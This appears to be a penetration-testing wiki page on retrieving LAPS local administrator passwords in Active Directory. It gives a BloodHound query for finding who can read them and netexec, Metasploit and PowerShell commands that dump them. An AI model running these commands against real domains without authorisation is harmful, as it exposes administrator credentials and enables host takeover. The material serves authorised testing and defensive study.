search
githubEdit

Get LAPS passwords

hashtag
Who can read LAPS?

hashtag
Bloodhound Cypher Query

MATCH p=(g:Group)-[:ReadLAPSPassword]->(c:Computer) RETURN p

hashtag
Get the LAPS password

hashtag
1) CrackMapExec/Netexec

netexec ldap DC_IP -d DOMAIN -u USER -p PASSWORD -M laps

hashtag
2) Metasploit

use post/windows/gather/credentials/enum_laps

hashtag
3) Powershell

Get-LAPSPasswords -DomainController DC_IP -Credential DOMAIN\LOGIN | Format-Table -AutoSize

hashtag
LAPS password gives us System\Admin access

PreviousACLs/ACEs permissions on GroupNextACLs/ACEs permissions on User

Last updated